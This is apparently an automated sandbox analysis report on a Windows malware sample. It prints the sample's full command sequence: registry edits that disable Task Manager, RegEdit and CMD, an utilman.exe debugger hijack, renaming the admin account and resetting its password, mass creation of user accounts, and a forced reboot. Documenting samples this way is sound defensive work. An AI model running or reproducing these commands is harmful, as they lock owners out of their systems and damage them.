Analysis

  • max time kernel
    5s
  • max time network
    8s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    18-10-2024 02:33

Errors

Reason
Machine shutdown

General

  • Target

    b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe

  • Size

    955KB

  • MD5

    bde1d37ad1cf05320955681bf6455efa

  • SHA1

    52feb8bc6c21770eea00d19b1c228ee707228da7

  • SHA256

    b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f

  • SHA512

    17d9f2c319aa082d5fdf97ba7bc49505c1f768bf217383b220204cf7b4511d0c227408200e40a943c1e5228a1199f7ef218d5fdfd66d394547a6efb4a72e1e15

  • SSDEEP

    24576:kuDXTIGaPhEYzUzA0SH6xrfNZh0WewxWr:DDjlabwz9nxJZ+wxc

Malware Config

Signatures

  • Disables RegEdit via registry modification 1 IoCs
  • Disables Task Manager via registry modification
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 28 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Accessibility Features 1 TTPs

    Windows contains accessibility features that may be used by adversaries to establish persistence and/or elevate privileges.

  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 8 IoCs
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 44 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe
    "C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe"
    1⤵
    • Checks computer location settings
    • Drops file in System32 directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1200
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\System32\Microsoft\Protect\Defender.Update\main.vbs"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4752
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Windows\System32\Microsoft\Protect\Defender.Update\main.cmd" "
        3⤵
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:1492
        • C:\Windows\system32\reg.exe
          REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d 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 /f
          4⤵
            PID:1016
          • C:\Windows\system32\reg.exe
            reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 0 /f
            4⤵
              PID:1836
            • C:\Windows\system32\reg.exe
              reg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d 1 /f
              4⤵
                PID:2932
              • C:\Windows\system32\reg.exe
                REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
                4⤵
                  PID:776
                • C:\Windows\system32\reg.exe
                  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v UseDefaultTile /t REG_DWORD /d 1 /f
                  4⤵
                    PID:4324
                  • C:\Windows\system32\reg.exe
                    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /t REG_SZ /d "NUL" /f
                    4⤵
                    • Event Triggered Execution: Image File Execution Options Injection
                    PID:3776
                  • C:\Windows\system32\reg.exe
                    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Windows\System32\Microsoft\Protect\Defender.Update\img000.png" /f
                    4⤵
                    • Sets desktop wallpaper using registry
                    PID:1788
                  • C:\Windows\system32\rundll32.exe
                    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                    4⤵
                      PID:2680
                    • C:\Windows\system32\reg.exe
                      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DontDisplayLastUserName /t REG_DWORD /d 1 /f
                      4⤵
                        PID:5096
                      • C:\Windows\system32\reg.exe
                        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v HideFastUserSwitching /t REG_DWORD /d 1 /f
                        4⤵
                          PID:2592
                        • C:\Windows\system32\reg.exe
                          reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DontDisplayUserName /t REG_DWORD /d 3 /f
                          4⤵
                            PID:3212
                          • C:\Windows\system32\reg.exe
                            reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
                            4⤵
                              PID:448
                            • C:\Windows\system32\reg.exe
                              reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 1 /f
                              4⤵
                                PID:3300
                              • C:\Windows\system32\reg.exe
                                reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
                                4⤵
                                • Disables RegEdit via registry modification
                                PID:4860
                              • C:\Windows\System32\Wbem\WMIC.exe
                                wmic useraccount where name='Admin' rename "YOU ARE THE NEXT"
                                4⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2828
                              • C:\Windows\system32\net.exe
                                net user "YOU ARE THE NEXT" "im dead"
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1616
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 user "YOU ARE THE NEXT" "im dead"
                                  5⤵
                                    PID:4392
                                • C:\Windows\system32\net.exe
                                  net user T3yZrQ Maxcheto /add
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:3084
                                  • C:\Windows\system32\net1.exe
                                    C:\Windows\system32\net1 user T3yZrQ Maxcheto /add
                                    5⤵
                                      PID:4284
                                  • C:\Windows\system32\net.exe
                                    net user 8rJpX1 Maxcheto /add
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:3280
                                    • C:\Windows\system32\net1.exe
                                      C:\Windows\system32\net1 user 8rJpX1 Maxcheto /add
                                      5⤵
                                        PID:1504
                                    • C:\Windows\system32\net.exe
                                      net user 9MaL2Z Maxcheto /add
                                      4⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:3456
                                      • C:\Windows\system32\net1.exe
                                        C:\Windows\system32\net1 user 9MaL2Z Maxcheto /add
                                        5⤵
                                          PID:3992
                                      • C:\Windows\system32\net.exe
                                        net user K4$dF27 Maxcheto /add
                                        4⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:2532
                                        • C:\Windows\system32\net1.exe
                                          C:\Windows\system32\net1 user K4$dF27 Maxcheto /add
                                          5⤵
                                            PID:3760
                                        • C:\Windows\system32\net.exe
                                          net user xC78RT Maxcheto /add
                                          4⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:3432
                                          • C:\Windows\system32\net1.exe
                                            C:\Windows\system32\net1 user xC78RT Maxcheto /add
                                            5⤵
                                              PID:2876
                                          • C:\Windows\system32\net.exe
                                            net user 3nL9$p2x Maxcheto /add
                                            4⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:3464
                                            • C:\Windows\system32\net1.exe
                                              C:\Windows\system32\net1 user 3nL9$p2x Maxcheto /add
                                              5⤵
                                                PID:2788
                                            • C:\Windows\system32\net.exe
                                              net user X7hbQ5Z Maxcheto /add
                                              4⤵
                                                PID:1432
                                                • C:\Windows\system32\net1.exe
                                                  C:\Windows\system32\net1 user X7hbQ5Z Maxcheto /add
                                                  5⤵
                                                    PID:1932
                                                • C:\Windows\system32\net.exe
                                                  net user R2xD1B Maxcheto /add
                                                  4⤵
                                                    PID:224
                                                    • C:\Windows\system32\net1.exe
                                                      C:\Windows\system32\net1 user R2xD1B Maxcheto /add
                                                      5⤵
                                                        PID:1984
                                                    • C:\Windows\system32\net.exe
                                                      net user m14T8z Maxcheto /add
                                                      4⤵
                                                        PID:3008
                                                        • C:\Windows\system32\net1.exe
                                                          C:\Windows\system32\net1 user m14T8z Maxcheto /add
                                                          5⤵
                                                            PID:3528
                                                        • C:\Windows\system32\net.exe
                                                          net user L27w8G Maxcheto /add
                                                          4⤵
                                                            PID:2364
                                                            • C:\Windows\system32\net1.exe
                                                              C:\Windows\system32\net1 user L27w8G Maxcheto /add
                                                              5⤵
                                                                PID:4108
                                                            • C:\Windows\system32\net.exe
                                                              net user P9dR2Y Maxcheto /add
                                                              4⤵
                                                                PID:2448
                                                                • C:\Windows\system32\net1.exe
                                                                  C:\Windows\system32\net1 user P9dR2Y Maxcheto /add
                                                                  5⤵
                                                                    PID:3576
                                                                • C:\Windows\system32\net.exe
                                                                  net user 5QL71t Maxcheto /add
                                                                  4⤵
                                                                    PID:1592
                                                                    • C:\Windows\system32\net1.exe
                                                                      C:\Windows\system32\net1 user 5QL71t Maxcheto /add
                                                                      5⤵
                                                                        PID:4672
                                                                    • C:\Windows\system32\net.exe
                                                                      net user r8B6V3F Maxcheto /add
                                                                      4⤵
                                                                        PID:5028
                                                                        • C:\Windows\system32\net1.exe
                                                                          C:\Windows\system32\net1 user r8B6V3F Maxcheto /add
                                                                          5⤵
                                                                            PID:2632
                                                                        • C:\Windows\system32\net.exe
                                                                          net user 7CXz1b Maxcheto /add
                                                                          4⤵
                                                                            PID:3384
                                                                            • C:\Windows\system32\net1.exe
                                                                              C:\Windows\system32\net1 user 7CXz1b Maxcheto /add
                                                                              5⤵
                                                                                PID:4972
                                                                            • C:\Windows\system32\net.exe
                                                                              net user n38vJQ Maxcheto /add
                                                                              4⤵
                                                                                PID:3584
                                                                                • C:\Windows\system32\net1.exe
                                                                                  C:\Windows\system32\net1 user n38vJQ Maxcheto /add
                                                                                  5⤵
                                                                                    PID:4144
                                                                                • C:\Windows\system32\net.exe
                                                                                  net user x6G7P1L Maxcheto /add
                                                                                  4⤵
                                                                                    PID:900
                                                                                    • C:\Windows\system32\net1.exe
                                                                                      C:\Windows\system32\net1 user x6G7P1L Maxcheto /add
                                                                                      5⤵
                                                                                        PID:4416
                                                                                    • C:\Windows\system32\net.exe
                                                                                      net user M239Wk Maxcheto /add
                                                                                      4⤵
                                                                                        PID:1104
                                                                                        • C:\Windows\system32\net1.exe
                                                                                          C:\Windows\system32\net1 user M239Wk Maxcheto /add
                                                                                          5⤵
                                                                                            PID:3664
                                                                                        • C:\Windows\system32\net.exe
                                                                                          net user 7F2hY4Z Maxcheto /add
                                                                                          4⤵
                                                                                            PID:4460
                                                                                            • C:\Windows\system32\net1.exe
                                                                                              C:\Windows\system32\net1 user 7F2hY4Z Maxcheto /add
                                                                                              5⤵
                                                                                                PID:4152
                                                                                            • C:\Windows\system32\net.exe
                                                                                              net user 8QrB1L7 Maxcheto /add
                                                                                              4⤵
                                                                                                PID:2732
                                                                                                • C:\Windows\system32\net1.exe
                                                                                                  C:\Windows\system32\net1 user 8QrB1L7 Maxcheto /add
                                                                                                  5⤵
                                                                                                    PID:4528
                                                                                                • C:\Windows\system32\net.exe
                                                                                                  net user t93V6D Maxcheto /add
                                                                                                  4⤵
                                                                                                    PID:2860
                                                                                                    • C:\Windows\system32\net1.exe
                                                                                                      C:\Windows\system32\net1 user t93V6D Maxcheto /add
                                                                                                      5⤵
                                                                                                        PID:2444
                                                                                                    • C:\Windows\system32\net.exe
                                                                                                      net user 5tG2Q8J Maxcheto /add
                                                                                                      4⤵
                                                                                                        PID:3040
                                                                                                        • C:\Windows\system32\net1.exe
                                                                                                          C:\Windows\system32\net1 user 5tG2Q8J Maxcheto /add
                                                                                                          5⤵
                                                                                                            PID:2648
                                                                                                        • C:\Windows\system32\net.exe
                                                                                                          net user x9K1P7L Maxcheto /add
                                                                                                          4⤵
                                                                                                            PID:4616
                                                                                                            • C:\Windows\system32\net1.exe
                                                                                                              C:\Windows\system32\net1 user x9K1P7L Maxcheto /add
                                                                                                              5⤵
                                                                                                                PID:5012
                                                                                                            • C:\Windows\system32\net.exe
                                                                                                              net user z7R4M3 Maxcheto /add
                                                                                                              4⤵
                                                                                                                PID:4888
                                                                                                                • C:\Windows\system32\net1.exe
                                                                                                                  C:\Windows\system32\net1 user z7R4M3 Maxcheto /add
                                                                                                                  5⤵
                                                                                                                    PID:1372
                                                                                                                • C:\Windows\system32\shutdown.exe
                                                                                                                  shutdown /r /f /t 0
                                                                                                                  4⤵
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:2148
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x4 /state0:0xa3956855 /state1:0x41c64e6d
    1⤵
    • Modifies data under HKEY_USERS
    • Suspicious use of SetWindowsHookEx
    PID:1476

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Windows\System32\Microsoft\Protect\Defender.Update\YA.NO.LO.PUEDES.RECUPERAR.txt

    Filesize

    64B


  • C:\Windows\System32\Microsoft\Protect\Defender.Update\guest.png

    Filesize

    68KB


  • C:\Windows\System32\Microsoft\Protect\Defender.Update\main.cmd

    Filesize

    5KB


  • C:\Windows\System32\Microsoft\Protect\Defender.Update\main.vbs

    Filesize

    134B


                                                                                                          • C:\Windows\System32\Microsoft\Protect\Defender.Update\user-192.png

                                                                                                            Filesize

                                                                                                            14KB

                                                                                                          • C:\Windows\System32\Microsoft\Protect\Defender.Update\user-32.png

                                                                                                            Filesize

                                                                                                            1KB

                                                                                                          • C:\Windows\System32\Microsoft\Protect\Defender.Update\user-40.png

                                                                                                            Filesize

                                                                                                            2KB

                                                                                                          • C:\Windows\System32\Microsoft\Protect\Defender.Update\user-48.png

                                                                                                            Filesize

                                                                                                            2KB

                                                                                                          • C:\Windows\System32\Microsoft\Protect\Defender.Update\user.bmp

                                                                                                            Filesize

                                                                                                            784KB

                                                                                                          • C:\Windows\System32\Microsoft\Protect\Defender.Update\user.png

                                                                                                            Filesize

                                                                                                            68KB

                                                                                                          • \??\PIPE\lsarpc
